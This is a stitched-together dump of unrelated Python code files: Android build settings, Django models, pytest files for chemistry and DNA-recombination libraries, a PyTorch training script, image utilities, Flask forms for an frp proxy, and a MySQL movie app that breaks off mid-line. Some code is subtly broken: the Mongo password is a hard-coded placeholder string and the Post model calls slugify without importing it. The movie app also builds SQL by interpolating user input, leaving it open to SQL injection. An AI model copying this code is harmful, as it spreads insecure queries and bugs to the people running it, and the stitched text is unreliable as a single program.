conf ################################################################ @conf def load_android_clang_common_settings(conf): """ Setup all compiler and linker settings shared over all android clang configurations !!! But not the actual compiler, since the compiler depends on the host !!! """ env = conf.env ndk_root = env['ANDROID_NDK_HOME'] # in ndk r13, they removed the 'libcxx' sub-dir, leaving 'include' in the root of the folder stl_root = os.path.join(ndk_root, 'sources', 'cxx-stl', 'llvm-libc++') if env['ANDROID_NDK_REV_MAJOR'] >= 13: stl_includes = os.path.join(stl_root, 'include') else: stl_includes = os.path.join(stl_root, 'libcxx', 'include') env['INCLUDES'] += [ stl_includes, os.path.join(ndk_root, 'sources', 'android', 'support', 'include') # the support includes must be after the stl ones ] common_flags = [ '-femulated-tls', # All accesses to TLS variables are converted to calls to __emutls_get_address in the runtime library '-Wno-unused-lambda-capture', # This was originally disabled only when building Android Clang on MacOS, but it seems the updated toolchain in NDK r15 has # become even more aggressive in "nonportable" include paths, meaning it's nearly impossible to fix the casing the compiler # thinks the path should be. # ORIGINAL COMMENT: Unless specified, OSX is generally case-preserving but case-insensitive. Windows is the same way, however # OSX seems to behave differently when it comes to casing at the OS level where a file can be showing as upper-case in Finder # and Terminal, the OS can see it as lower-case. '-Wno-nonportable-include-path', ] env['CFLAGS'] += common_flags[:] env['CXXFLAGS'] += common_flags[:] env['CXXFLAGS'] += [ '-fms-extensions', # Allow MSVC language extensions ] env['LIB'] += [ 'c++_shared', # shared library of llvm stl ] env['LIBPATH'] += [ os.path.join(stl_root, 'libs', env['ANDROID_ARCH']), ] env['LINKFLAGS'] += [ '-Wl,--gc-sections,--icf=safe', # --gc-sections will discard unused sections. 
--icf=safe will remove duplicate code ] # these aren't defined in the common clang settings env['SHLIB_MARKER'] = '-Wl,-Bdynamic' env['STLIB_MARKER'] = '-Wl,-Bstatic' # required 3rd party libs that need to be included in the apk env['EXT_LIBS'] += [ conf.add_to_android_cache(os.path.join(stl_root, 'libs', env['ANDROID_ARCH'], 'libc++_shared.so')) ] # not used on android env['ARCH_ST'] = [] # disable support for the following build options env['COMPILER_FLAGS_DisableOptimization'] = [ ] env['COMPILER_FLAGS_DebugSymbols'] = [ ] ################################################################ @conf def load_debug_android_clang_settings(conf): """ Setup all compiler and linker settings shared over all android clang configurations for the "debug" configuration """ conf.load_android_clang_common_settings() ################################################################ @conf def load_profile_android_clang_settings(conf): """ Setup all compiler and linker settings shared over all android clang configurations for the "profile" configuration """ conf.load_android_clang_common_settings() ################################################################ @conf def load_performance_android_clang_settings(conf): """ Setup all compiler and linker settings shared over all android clang configurations for the "performance" configuration """ conf.load_android_clang_common_settings() ################################################################ @conf def load_release_android_clang_settings(conf): """ Setup all compiler and linker settings shared over all android clang configurations for the "release" configuration """ conf.load_android_clang_common_settings() from django.db import models from django.db.models import Q class CommentManager(models.Manager): def get_queryset(self): return super().get_queryset().prefetch_related() def get_for_user(self, user): return self.get_queryset().filter( ( # TODO: include comments liked by user # Q(likes_author__in=user) | ~Q(reports__in=[user]) ) ) import gc import itertools import typing T = typing.TypeVar("T") def chunk_list( iterable: typing.Iterable[T], batch_size: int = 1000 ) -> typing.Iterator[typing.List[T]]: it = iter(iterable) while True: chunk = list(itertools.islice(it, batch_size)) if not chunk: return yield chunk gc.collect() def data_matches_schema( data: typing.Dict[str, typing.Any], obj: typing.Type[object] ) -> bool: annotations = typing.get_type_hints(obj) for variable, expected_type in annotations.items(): datum = data.get(variable) if datum is None: continue if not _data_matches_schema_inner(datum, expected_type): return False return True def _data_matches_schema_inner( data: typing.Any, expected_type: typing.Type[object] ) -> bool: if expected_type is typing.Any: return True if isinstance(expected_type, typing._GenericAlias): # type: ignore typ = expected_type.__origin__ if not isinstance(data, typ): return False args = expected_type.__args__ if typ is list: for v in data: if not _data_matches_schema_inner(v, args[0]): return False else: raise TypeError(f"{typ} is unsupported") elif not isinstance(data, expected_type): return False return True pydefect/tests/chem_pot_diag/test_cpd_plotter.py # -*- coding: utf-8 -*- import numpy as np import pytest from pydefect.chem_pot_diag.chem_pot_diag import ChemPotDiag, CpdPlotInfo, \ CompositionEnergy from pydefect.chem_pot_diag.cpd_plotter import ( ChemPotDiagMpl2DMplPlotter, transpose, sort_coords, ChemPotDiagMpl3DMplPlotter, ChemPotDiagPlotly2DMplPlotter, ChemPotDiagPlotly3DMplPlotter) from 
pymatgen.core.composition import Composition from vise.util.dash_helper import show_png try: import psutil PSUTIL_NOT_PRESENT = False except ModuleNotFoundError: PSUTIL_NOT_PRESENT = True @pytest.fixture def cpd_plot_info_2d(): energies = [CompositionEnergy(Composition("H"), 0.0, ""), CompositionEnergy(Composition("O"), 1.0, ""), CompositionEnergy(Composition("H4O2"), -4.0, "")] cpd = ChemPotDiag(energies, target=Composition("H2O")) return CpdPlotInfo(cpd, min_range=-10) @pytest.mark.skipif(False, reason="") def test_cpd_2d_draw(cpd_plot_info_2d): plotter = ChemPotDiagMpl2DMplPlotter(cpd_plot_info_2d) plotter.draw_diagram().show() @pytest.fixture def cpd_3d_info(): energies = [CompositionEnergy(Composition("H"), 0.0, ""), CompositionEnergy(Composition("O"), 1.0, ""), CompositionEnergy(Composition("H4O2"), -4.0, ""), CompositionEnergy(Composition("MgH2O"), -10.0, ""), CompositionEnergy(Composition("Mg"), 0.0, ""), CompositionEnergy(Composition("MgO"), -3.0, "")] cpd = ChemPotDiag(energies, target=Composition("MgH2O")) return CpdPlotInfo(cpd) @pytest.mark.skipif(False, reason="") def test_cpd_3d_draw(cpd_3d_info): plotter = ChemPotDiagMpl3DMplPlotter(cpd_3d_info) plotter.draw_diagram().show() def test_transpose(): target_list = [[1, 2], [3, 4]] actual = transpose(target_list) expected = [[1, 3], [2, 4]] assert actual == expected def test_sort_coords(): coords = np.array([[3, 2, -1], [-1, 2, 0], [-6, -1, 4], [1, -3, 3]]) expected = np.array([[1, -3, 3], [-6, -1, 4], [-1, 2, 0], [3, 2, -1]]) np.testing.assert_array_equal(sort_coords(coords), expected) @pytest.mark.skipif(PSUTIL_NOT_PRESENT, reason="psutil does not exist") def test_plotly_2d(cpd_plot_info_2d): plotter = ChemPotDiagPlotly2DMplPlotter(cpd_plot_info_2d) fig = plotter.figure # fig.show() show_png(fig) @pytest.mark.skipif(PSUTIL_NOT_PRESENT, reason="psutil does not exist") def test_plotly_3d(cpd_3d_info): plotter = ChemPotDiagPlotly3DMplPlotter(cpd_3d_info) fig = plotter.figure # fig.show() show_png(fig) import pytest from Bio.SeqRecord import SeqRecord from Bio.Seq import Seq import crecombio def test_count_number_of_sites(): seq_with_three_sites = SeqRecord( Seq( "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAA" "AAAAAAAAAGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCCCCCCCCCCCCCCCC" "GGGAAGTTCCTATACTTTCTAGAGAATAGGAACTTCC" ) ) site = crecombio.SITES["Flp"]["seq"] matches, rc_matches = crecombio.count_number_of_sites(seq_with_three_sites, site) assert matches == [26, 82] assert rc_matches == [145] def test_recombine_one_sequence(): # Not 2 FRT sites: no_frt_seq = SeqRecord(Seq("ATCG")) with pytest.raises(Exception): crecombio.recombine_one_sequence([no_frt_seq]) # FRTs in same direction: excision_seq = SeqRecord( Seq( "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAA" "AAAAAAAAAGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCCCCCCCCCCCCCCCC" ) ) results = crecombio.recombine_one_sequence([excision_seq]) assert ( str(results[0].seq) == "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCCC" "CCCCCCCCCCCCC" ) # FRTs in opposite direction: inversion_seq = SeqRecord( Seq( "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAA" "GGGGGGGGGGGGGAAGTTCCTATACTTTCTAGAGAATAGGAACTTCCCCCCCCCCCCCCCCCCCCCCCCCCCC" ) ) results = crecombio.recombine_one_sequence([inversion_seq]) assert ( str(results[0].seq) == "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCT" "TTTTTTTTTTTTGAAGTTCCTATACTTTCTAGAGAATAGGAACTTCCCCCCCCCCCCCCCCCCCCCCCCCCCC" ) 
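# --- Illustrative sketch (not part of crecombio) ---------------------------
# The assertions above compare start positions of the Flp/FRT site found on the
# forward strand with those found as its reverse complement. As a rough
# illustration of what those two lists represent, the hypothetical helper below
# collects 0-based start positions of a site and of its reverse complement with
# plain string searching; index conventions may differ from crecombio's own
# count_number_of_sites, so this is only a sketch of the idea.
from Bio.Seq import Seq  # already imported at the top of this module


def _find_site_positions_sketch(sequence: str, site: str):
    """Return (forward_hits, reverse_complement_hits) as lists of 0-based indices."""

    def _all_positions(haystack: str, needle: str):
        # Collect every (possibly overlapping) occurrence of needle in haystack.
        hits, start = [], haystack.find(needle)
        while start != -1:
            hits.append(start)
            start = haystack.find(needle, start + 1)
        return hits

    rc_site = str(Seq(site).reverse_complement())
    return _all_positions(sequence, site), _all_positions(sequence, rc_site)
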
def test_recombine_two_sequences(): # Test translocation: seq0 = SeqRecord( Seq("AAAAAAAAAAAAAAAAAAAAGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAA") ) seq1 = SeqRecord( Seq("TTTTTTTTTTTTTTTTTTTTGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCTTTTTTTTTTTT") ) recombined_seqs = crecombio.recombine_two_sequences([seq0, seq1]) assert ( str(recombined_seqs[0].seq) == "AAAAAAAAAAAAAAAAAAAAGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCTTTTTTTTTTTT" ) assert ( str(recombined_seqs[1].seq) == "TTTTTTTTTTTTTTTTTTTTGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAA" ) # Test insertion: excision_seq = SeqRecord( Seq( "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAA" "AAAAAAAAAGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCCCCCCCCCCCCCCCC" ) ) target_seq = SeqRecord( Seq("GGGGGGGGGGGGGGGGGGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCTTTTTTTTTTTTTTTTT") ) # Excision seq first, target seq second: recombined_seqs = crecombio.recombine_two_sequences([excision_seq, target_seq]) assert ( str(recombined_seqs[0].seq) == "GGGGGGGGGGGGGGGGGGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAAAAAAAAAAAGA" "AGTTCCTATTCTCTAGAAAGTATAGGAACTTCTTTTTTTTTTTTTTTTT" ) assert ( str(recombined_seqs[1].seq) == "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCCC" "CCCCCCCCCCCCC" ) # Target seq first, excision seq second: recombined_seqs = crecombio.recombine_two_sequences([target_seq, excision_seq]) assert ( str(recombined_seqs[0].seq) == "GGGGGGGGGGGGGGGGGGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAAAAAAAAAAAGA" "AGTTCCTATTCTCTAGAAAGTATAGGAACTTCTTTTTTTTTTTTTTTTT" ) assert ( str(recombined_seqs[1].seq) == "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCCCCCCCCCCCCCCC" "CCCCCCCCCCCCC" ) # 2x2 FRT sites: with pytest.raises(Exception): crecombio.recombine_two_sequences([excision_seq, excision_seq]) # Incorrect number of FRT sites: with pytest.raises(Exception): crecombio.recombine_two_sequences( [SeqRecord(Seq("ATCG")), SeqRecord(Seq("ATCG"))] ) def test_recombine(): excision_seq = SeqRecord( Seq( "GACTGATGTGACGTGTGACAGCTGACGAAGTTCCTATTCTCTAGAAAGTATAGGAACTTCAAAAAAAAAAAAA" "GGGGGGGGGGGGGAAGTTCCTATACTTTCTAGAGAATAGGAACTTCCCCCCCCCCCCCCCCCCCCCCCCCCCC" ) ) crecombio.recombine([excision_seq]) # 1 seq crecombio.recombine([excision_seq, excision_seq]) # 2 seq with pytest.raises(Exception): crecombio.recombine( [excision_seq, excision_seq, excision_seq] ) # not 1 or 2 seq import os from flask_mongoengine import MongoEngine def init_database_connection(app): app.config['MONGODB_SETTINGS'] = { 'db': os.environ.get('DATABASE_NAME'), 'host': 'mongodb+srv://' + os.environ.get('HOST') + '/' + os.environ.get('DATABASE_NAME') + '?retryWrites=true&w=majority', 'username': os.environ.get('USERNAME'), # 'username': 'justinhchae@admin', 'password': ('PASSWORD') } db = MongoEngine() db.init_app(app)from django.db import models from hitcount.models import HitCountMixin, HitCount from django.contrib.contenttypes.fields import GenericRelation from django.utils.encoding import python_2_unicode_compatible @python_2_unicode_compatible class Post(models.Model): title = models.CharField(max_length=100) description = models.TextField() published = models.DateField(auto_now_add=True) slug = models.SlugField(unique=True, max_length=100) hit_count_generic = GenericRelation(HitCount, object_id_field='object_pk', related_query_name='hit_count_generic_relation') def __str__(self): return self.title def save(self, *args, **kwargs): if not self.slug: self.slug = slugify(self.title) return super(Post, self).save(*args, **kwargs)import torch import 
random import torch.autograd as autograd import torch.nn as nn import torch.nn.functional as F import os from utils.conf import args, set_random_seed from models.Set2Seq2Seq import ListeningAgent from models.Losses import seq_cross_entropy_loss from preprocesses.DataIterator import PairDataset from preprocesses.Voc import Voc from analysis.cal_topological_similarity import cal_topological_sim from analysis.get_input_message_pairs import reproduce_msg_output class Set2Seq2Seq(nn.Module): def __init__(self, voc_size, msg_length=args.max_msg_len, msg_vocsize=args.msg_vocsize, hidden_size=args.hidden_size, dropout=args.dropout_ratio): super().__init__() self.voc_size = voc_size self.msg_length = msg_length self.msg_vocsize = msg_vocsize self.hidden_size = hidden_size self.dropout = dropout # For embedding inputs self.embedding = nn.Embedding(self.voc_size, self.hidden_size) self.msg_embedding = nn.Embedding(self.msg_vocsize, self.hidden_size).weight # Listening agent self.listener = ListeningAgent( self.msg_vocsize, self.hidden_size, self.voc_size, self.dropout, self.embedding.weight, self.msg_embedding ) def forward(self, data_batch): input_var = data_batch['input'] msg_mask = data_batch['input_mask'] target_var = data_batch['target'] target_mask = data_batch['target_mask'] target_max_len = data_batch['target_max_len'] msg = F.one_hot(input_var, num_classes=args.msg_vocsize).to(torch.float32) msg_mask = msg_mask.to(torch.float32).unsqueeze(1) listener_outputs = self.listener(msg, msg_mask, target_max_len) loss_max_len = min(listener_outputs.shape[0], target_var.shape[0]) loss, print_losses, tok_correct, seq_correct, tok_acc, seq_acc\ = seq_cross_entropy_loss(listener_outputs, target_var, target_mask, loss_max_len) return loss, 0., print_losses, tok_correct, seq_correct, tok_acc, seq_acc def train_epoch(model, data_batch, m_optimizer, clip=args.clip): # Zero gradients m_optimizer.zero_grad() # Forward pass through model loss, baseline, print_losses, tok_correct, seq_correct, tok_acc, seq_acc = model(data_batch) # Perform backpropatation loss.mean().backward() # Clip gradients: gradients are modified in place nn.utils.clip_grad_norm_(model.parameters(), clip) # Adjust model weights m_optimizer.step() return seq_acc, tok_acc, sum(print_losses) / len(print_losses) def eval_model(model, dataset): model.eval() loss = 0. seq_acc = 0. tok_acc = 0. 
for _, data_batch in enumerate(dataset): _, baseline, print_losses, tok_correct, seq_correct, t_acc, s_acc = model(data_batch) loss += sum(print_losses) / len(print_losses) seq_acc += s_acc tok_acc += t_acc loss /= len(dataset) seq_acc /= len(dataset) tok_acc /= len(dataset) model.train() return seq_acc, tok_acc, loss def train(): print('building vocabulary...') voc = Voc() print('done') print('loading data and building batches...') train_set = PairDataset(voc, dataset_file_path=args.train_file) dev_set = PairDataset(voc, dataset_file_path=args.dev_file) # test_set = PairDataset(voc, dataset_file_path=TEST_FILE_PATH) print('done') if args.param_file is not None: print('loading saved parameters from ' + args.param_file + '...') checkpoint = torch.load(args.param_file, map_location=args.device) train_args = checkpoint['args'] voc = checkpoint['voc'] print('done') print('arguments for training:') print(train_args) print('rebuilding model...') model = Set2Seq2Seq(voc.num_words).to(args.device) model.load_state_dict(checkpoint['model']) model_optimiser = train_args.optimiser(model.parameters(), lr=train_args.learning_rate) print('\tdone') else: print('building model...') model = Set2Seq2Seq(voc.num_words).to(args.device) model_optimiser = args.optimiser(model.parameters(), lr=args.learning_rate) print('done') print('initialising...') start_iteration = 1 print_loss = 0. print_seq_acc = 0. print_tok_acc = 0. max_dev_seq_acc = 0. max_dev_tok_acc = 0. training_losses = [] training_tok_acc = [] training_seq_acc = [] training_sim = [] eval_tok_acc = [] eval_seq_acc = [] print('done') print('training...') for iter in range(start_iteration, args.iter_num+1): for idx, data_batch in enumerate(train_set): seq_acc, tok_acc, loss = train_epoch(model, data_batch, model_optimiser ) print_loss += loss print_seq_acc += seq_acc print_tok_acc += tok_acc if iter % args.print_freq == 0: print_loss_avg = print_loss / (args.print_freq * len(train_set)) print_seq_acc_avg = print_seq_acc / (args.print_freq * len(train_set)) print_tok_acc_avg = print_tok_acc / (args.print_freq * len(train_set)) print("Iteration: {}; Percent complete: {:.1f}%; Avg loss: {:.4f}; Avg seq acc: {:.4f}; Avg tok acc: {:.4f}".format( iter, iter / args.iter_num * 100, print_loss_avg, print_seq_acc_avg, print_tok_acc_avg )) training_seq_acc.append(print_seq_acc_avg) training_tok_acc.append(print_tok_acc_avg) training_losses.append(print_loss_avg) print_seq_acc = 0. print_tok_acc = 0. print_loss = 0. 
if iter % args.eval_freq == 0: dev_seq_acc, dev_tok_acc, dev_loss = eval_model(model, dev_set) if dev_seq_acc > max_dev_seq_acc: max_dev_seq_acc = dev_seq_acc if dev_tok_acc > max_dev_tok_acc: max_dev_tok_acc = dev_tok_acc eval_tok_acc.append(dev_tok_acc) eval_seq_acc.append(dev_seq_acc) print("[EVAL]Iteration: {}; Loss: {:.4f}; Avg Seq Acc: {:.4f}; Avg Tok Acc: {:.4f}; Best Seq Acc: {:.4f}".format( iter, dev_loss, dev_seq_acc, dev_tok_acc, max_dev_seq_acc)) if iter % args.save_freq == 0: path_join = 'listener_' + str(args.num_words) + '_' + args.msg_mode path_join += '_hard' if not args.soft else '_soft' directory = os.path.join(args.save_dir, path_join) if not os.path.exists(directory): os.makedirs(directory) torch.save({ 'iteration': iter, 'model': model.state_dict(), 'opt': [ model_optimiser.state_dict() ], 'loss': loss, 'voc': voc, 'args': args, 'records': { 'training_loss': training_losses, 'training_tok_acc': training_tok_acc, 'training_seq_acc': training_seq_acc, 'training_sim': training_sim, 'eval_tok_acc': eval_tok_acc, 'eval_seq_acc': eval_seq_acc } }, os.path.join(directory, '{}_{}_{}.tar'.format(args.seed, iter, 'checkpoint'))) def test(): if args.param_file is None: print('please specify the saved param file.') exit(-1) else: print('loading saved parameters from ' + args.param_file + '...') checkpoint = torch.load(args.param_file, map_location=args.device) train_args = checkpoint['args'] voc = checkpoint['voc'] print('done') print('arguments for train:') print(train_args) print('rebuilding model...') model = Set2Seq2Seq(voc.num_words).to(args.device) model.load_state_dict(checkpoint['model']) model_optimizer = train_args.optimiser(model.parameters(), lr=args.learning_rate) model_optimizer.load_state_dict(checkpoint['opt']) print('done') print('loading test data...') test_set = PairDataset(voc, dataset_file_path=args.test_file) print('done') test_seq_acc, test_tok_acc, test_loss = eval_model(model, test_set) print("[TEST]Loss: {:.4f}; Seq-level Accuracy: {:.4f}; Tok-level Accuracy: {:.4f}".format( test_loss, test_seq_acc * 100, test_tok_acc * 100) ) if __name__ == '__main__': set_random_seed(args.seed) with autograd.detect_anomaly(): print('with detect_anomaly') if args.test: test() else: train() from typing import List class Solution: def can_place_flowers(self, flowerbed: List[int], n: int) -> bool: ans = 0 temp = [0] + flowerbed + [0] for i in range(1, len(temp) - 1): if temp[i - 1] == temp[i + 1] == temp[i] == 0: ans += 1 temp[i] = 1 return ans >= n if __name__ == "__main__": assert not Solution().can_place_flowers([1, 0, 0, 1, 0, 0, 1], 1) assert Solution().can_place_flowers([0, 0, 1, 0, 0], 2) tkrons/SPFlow_topdownrules """ Created on August 29, 2018 @author: """ from numpy.random.mtrand import RandomState from scipy.misc import imresize, imsave from spn.data.datasets import get_mnist import numpy as np def get_imgs(dataset, size=(20, 20)): assert dataset.shape[1] == np.prod(size), "invalid image size for dataset size" return dataset.reshape(dataset.shape[0], size[0], size[1]) def get_blocks(imgs, num_blocks=(2, 2), blocks=[0, 1]): assert imgs.shape[1] % num_blocks[0] == 0, "invalid image size for num_blocks" assert imgs.shape[2] % num_blocks[1] == 0, "invalid image size for num_blocks" vsplits = np.split(imgs, num_blocks[0], axis=1) splits = [np.split(vs, num_blocks[1], axis=2) for vs in vsplits] blocks_imgs = np.concatenate(splits) ds = np.concatenate([b.reshape(imgs.shape[0], -1) for b in blocks_imgs[blocks]], axis=1) return ds, blocks def stitch_imgs(imgs=0, 
img_size=(20, 20), num_blocks=(2, 2), blocks=None): block_size = (img_size[0] // num_blocks[0], img_size[1] // num_blocks[1]) result = np.zeros((imgs, img_size[0], img_size[1])) result_idx = np.arange(0, np.prod(num_blocks)).reshape(num_blocks[0], num_blocks[1]) for block_pos, block_values in blocks.items(): if type(block_pos) == int: block_pos = [block_pos] sub_blocks = np.split(block_values, len(block_pos), axis=1) for bp, bv in zip(block_pos, sub_blocks): bv = bv.reshape(-1, block_size[0], block_size[1]) idx, idy = np.where(result_idx == bp) idx = idx[0] * block_size[0] idy = idy[0] * block_size[1] result[:, idx : idx + block_size[0], idy : idy + block_size[1]] = bv return result def rescale(ds, original_size=(28, 28), new_size=(20, 20)): assert ds.shape[1] == np.prod(original_size), "invalid image size for dataset size" assert np.all(np.array(new_size) > 0), "new_size should be positive" img_data = np.reshape(ds, (-1, original_size[0], original_size[1])) return np.asarray([imresize(image, new_size) for image in img_data], dtype=np.float64).reshape(ds.shape[0], -1) def show_img(img): import matplotlib.pyplot as plt plt.imshow(img) plt.show() def save_img(img, path): imsave(path, img) def standardize(imgs): return imgs / np.max(imgs) def add_poisson_noise(imgs, seed=123): poisson_noise = RandomState(seed).poisson(lam=1, size=imgs.shape) return imgs + poisson_noise def get_sub_blocks(block, inp=[1, 0], output=[0]): sub_blocks = np.split(block, len(inp), axis=1) res_blocks = [sub_blocks[inp.index(o)] for o in output] result = np.concatenate(res_blocks, axis=1) return result def set_sub_block_nans(block, inp=[1, 0], nans=[0]): block_size = block.shape[1] // len(inp) for o in nans: clear_index = inp.index(o) rpos = clear_index * block_size block[:, rpos : rpos + block_size] = np.nan return block if __name__ == "__main__": images_tr, labels_tr, images_te, labels_te = get_mnist() ds = images_tr[[0, 1, 2], :] ds = rescale(ds, original_size=(28, 28), new_size=(20, 40)) imgs = get_imgs(ds, size=(20, 40)) show_img(imgs[0]) blocks0, _ = get_blocks(imgs, num_blocks=(2, 2), blocks=[0]) blocks10, _ = get_blocks(imgs, num_blocks=(2, 2), blocks=[1, 0]) blocks210, _ = get_blocks(imgs, num_blocks=(2, 2), blocks=[2, 1, 0]) blocks3210, _ = get_blocks(imgs, num_blocks=(2, 2), blocks=[3, 2, 1, 0]) block_img = stitch_imgs( blocks0.shape[0], img_size=(20, 40), num_blocks=(2, 2), blocks={(3, 2, 1, 0): set_sub_block_nans(blocks3210, inp=[3, 2, 1, 0], nans=[0])} # blocks={(0): blocks0, # (1): get_sub_blocks(blocks10, inp=[1, 0], output=[1]), # (2): get_sub_blocks(blocks210, inp=[2, 1, 0], output=[2]), # (3): get_sub_blocks(blocks3210, inp=[3, 2, 1, 0], output=[3])} ) show_img(block_img[0]) # coding:utf-8 import sys reload(sys) sys.setdefaultencoding('utf8') from flask_wtf import Form from wtforms import SelectField, StringField, TextAreaField, SubmitField, PasswordField,IntegerField,FileField,BooleanField from wtforms.validators import DataRequired, Length, Email, EqualTo class baseForm(Form): name = StringField(u'名称(仅仅作为标记):', validators=[DataRequired(), Length(1, 64)]) class proxybaseForm(baseForm): frpc = SelectField(u'选择一个已经创建的Frpc:', coerce=int, validators=[DataRequired()]) class localproxybaseForm(proxybaseForm): local_ip = StringField(u'本地ip地址:') # 127.0.0.1 local_port = StringField(u'本地端口:', validators=[DataRequired()]) # 22 use_encryption = BooleanField(u'是否加密:') # false use_compression = BooleanField(u'是否压缩:') # false class CommonForm(baseForm): user = StringField(u'frpc用户名:', validators=[DataRequired(), 
Length(1, 64)]) # your_name server_addr = StringField(u'服务器地址:', validators=[DataRequired(), Length(1, 16)]) # 0.0.0.0 server_port = StringField(u'服务器端口:', validators=[DataRequired()]) # 7000 log_file = StringField(u'日志保存位置:') # ./ frpc.log log_level = StringField(u'日志等级:') # info log_max_days = StringField(u'日志存储天数:') # 3 privilege_token = StringField(u'服务器秘钥:') # 12345678 admin_addr = StringField(u'admin绑定地址:') # 127.0.0.1 admin_port = StringField(u'admin绑定端口:') # 7400 admin_user = StringField(u'admin用户名:') # admin admin_pwd = StringField(u'admin密码:') # admin pool_count = StringField(u'连接池数量:') # 5 tcp_mux = StringField(u'tcp_mux:') # true login_fail_exit = StringField(u'登录失败退出:') # true protocol = StringField(u'传输协议:') # tcp start = StringField(u'启用的代理:') # ssh,dns heartbeat_interval = StringField(u'心跳间隔:') # 30 heartbeat_timeout = StringField(u'心跳超时时间:') # 90 submit = SubmitField('添加') class TCPForm(localproxybaseForm): remote_port = StringField(u'远程服务器端口:') # 6001 submit = SubmitField('添加') class UDPForm(localproxybaseForm): remote_port = StringField(u'远程服务器端口:') # 6002 submit = SubmitField('添加') class HTTPForm(localproxybaseForm): http_user = StringField(u'http用户名:') # admin http_pwd = StringField(u'http密码:') # admin subdomain = StringField(u'子域:') # web01 custom_domains = StringField(u'域名:') # web02.yourdomain.com locations = StringField(u'路径:') # /, / pic host_header_rewrite = StringField(u'头部重写:') # example.com submit = SubmitField('添加') class HTTPSForm(localproxybaseForm): subdomain = StringField(u'子域名:') # web01 custom_domains = StringField(u'域名:') # web02.yourdomain.com submit = SubmitField('添加') class PluginUnixSocketForm(proxybaseForm): remote_port = StringField(u'远程服务器端口:') # 6003 plugin_unix_path = StringField(u'Unix socket位置:') # / var / run / docker.sock submit = SubmitField('添加') class PluginHttpForm(proxybaseForm): remote_port = StringField(u'远程服务器端口:') # 6004 plugin_http_user = StringField(u'http用户名:') # abc plugin_http_passwd = StringField(u'http密码:') # abc submit = SubmitField('添加') class stcpForm(localproxybaseForm): sk = StringField(u'校验码(sk):') # abcdefg submit = SubmitField('添加') class stcpVistorForm(proxybaseForm): server_name = StringField(u'服务器名:') # secret_tcp sk = StringField(u'校验码(sk):') # abcdefg bind_addr = StringField(u'绑定地址:') # 127.0.0.1 bind_port = StringField(u'绑定端口:') # 9000 use_encryption = BooleanField(u'是否加密:') # false use_compression = BooleanField(u'是否压缩:') # false submit = SubmitField('添加') app.py import pymysql db = pymysql.connect(host="localhost", user="root", password="", database="movies", charset="utf8mb4", cursorclass=pymysql.cursors.Cursor) cursor = db.cursor() print('Hi, welcome in the Movie Collection App!\n') menu_text = """Select what you want to do: l - See the full list of movies in the list a - Add a new movie to the list f - Find a movie in the list q - Quit\n""" menu_input = input(menu_text).lower() # Asks user what to do def add_movie(): # add movie function movie_title = input('Enter the title of the movie:\n').title() # title variable movie_director = input(f'Enter the director of {movie_title}:\n').title() # director variable movie_year = input(f'Enter the year of {movie_title}:\n') # year variable print(f"""Movie '{movie_title}' directed by {movie_director} in {movie_year} was added to the collection successfully.\n""") # Success message sql_create_query = """CREATE TABLE IF NOT EXISTS movie_list (id int PRIMARY KEY AUTO_INCREMENT, name VARCHAR (256) NOT NULL, director VARCHAR (256) NOT NULL, year INT NOT NULL);""" 
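# Note (illustrative, not part of the original app): the INSERT statement below
# is built with an f-string, so user input is interpolated directly into SQL and
# a title containing a quote character breaks the query. pymysql supports
# parameterized queries, which sidesteps both problems; a sketch of the
# equivalent call, using the same table and columns, would be:
#   cursor.execute(
#       "INSERT INTO movie_list (name, director, year) VALUES (%s, %s, %s)",
#       (movie_title, movie_director, movie_year),
#   )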
sql_insert_query = f"""INSERT INTO movie_list (name, director, year) VALUES ('{movie_title}','{movie_director}','{movie_year}');""" try: cursor.execute(sql_create_query) cursor.execute(sql_insert_query) db.commit() except: db.rollback() def show_movie_list(): sql_select_query = """SELECT name, director, year FROM movie_list""" cursor.execute(sql_select_query) movie_list_sql = cursor.fetchall() i = 1 print("Movie Collection: ") for movie in movie_list_sql: print(f"{i}. {movie[0]} -- {movie[1]} -- {movie[2]}") i += 1 print('\n') def is_number(s): try: float(s) return True except ValueError: return False def find_movie(): sql_select_query = """SELECT name, director, year FROM movie_list""" cursor.execute(sql_select_query) movie_list_sql = cursor.fetchall() input_find_text = """\nDo you want to find a movie using: Name (n) Director (d) Year (y) Go Back (b)\n""" user_find_input = input(input_find_text).lower() name_index = 0 director_index = 0 year_index = 0 while user_find_input != 'b': if user_find_input == 'n': name_input = input("Search for: \n").title() for movie in movie_list_sql: if name_input not in movie[0]: pass else: print(f"{name_index+1}. {movie[0]} -- {movie[1]} -- {movie[2]}") name_index += 1 if name_index == 0: print("No item found") user_find_input = input(input_find_text).lower() name_index = 0 elif user_find_input == 'd': director_input = input("Search for: \n").title() for movie in movie_list_sql: if director_input not in movie[1]: pass else: print(f"{director_index+1}. {movie[0]} -- {movie[1]} -- {movie[2]}") director_index += 1 if director_index == 0: print("No item found") user_find_input = input(input_find_text) director_index = 0 elif user_find_input == 'y': year_input = str(input("Search for: \n")) for movie in movie_list_sql: if year_input not in str(movie[2]): pass else: print(f"{year_index+1}. {movie[0]} -- {movie[1]} 